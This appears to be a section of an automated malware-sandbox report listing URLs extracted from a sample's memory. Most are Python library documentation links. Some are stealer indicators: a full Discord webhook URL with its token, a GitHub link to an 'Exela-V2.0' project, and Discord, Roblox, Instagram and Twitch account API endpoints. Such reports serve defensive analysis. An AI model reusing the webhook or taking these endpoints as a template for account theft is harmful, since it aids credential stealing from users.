            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/changelog/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/installation/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/security/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2441640857.0000018B47386000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434720630.0000018B47384000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429494966.0000018B47368000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2419006328.0000018B47366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/users/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446094364.0000018B48C90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430327032.0000018B487FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437876998.0000018B47955000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B478B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435278581.0000018B47933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437147317.0000018B47A0B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434152201.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429561498.0000018B47A05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2444141427.0000018B47A0B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445233438.0000018B48010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435080757.0000018B47A0A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46E70000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129376169.0000018B45151000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440123869.0000018B45156000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434927135.0000018B4511D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://filepreviews.io/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445342112.0000018B48180000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C2A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440123869.0000018B4511E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434927135.0000018B4511D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
            Source: METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography/issues
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1328)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1329)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1330)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437876998.0000018B47955000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B478B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435278581.0000018B47933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/136
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2443973271.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433238655.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B4797A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2432689144.0000018B4797A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/251
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2437876998.0000018B47955000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427074219.0000018B478B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2435278581.0000018B47933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/428
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440940255.0000018B46EF8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440123869.0000018B4511E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434927135.0000018B4511D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434786649.0000018B47625000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2442892896.0000018B47626000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2429421045.0000018B47A65000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445032411.0000018B47EF0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2418139053.0000018B47A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/28073
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Ex
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0/Exela-V2.0
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.00
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.00%:H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0zI
            Source: METADATA.0.drString found in binary or memory: https://github.com/sponsors/hynek
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/sponsors/hynek).
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129162473.0000018B451A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440123869.0000018B4511E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2434927135.0000018B4511D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2129177837.0000018B4514B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2417280165.0000018B49E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m
            Source: powershell.exe, 00000051.00000002.2305154049.00000260C1DB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000051.00000002.2338573080.00000260D91D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gql.twitch.tv/gql
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121744174.000002BD8672F000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://hynek.me/articles/import-attrs/)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2432689144.0000018B4797A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpg0m9H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpgpZ9H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/8po0puy.jfif
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/8po0puy.jfifPY9H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/eai9bwi.jpg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/qxnzimj.jpg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=true
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445502760.0000018B482AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/0X9H
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2122360531.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instagram.com/
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com/p
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2121685153.000002BD86721000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://klaviyo.com/
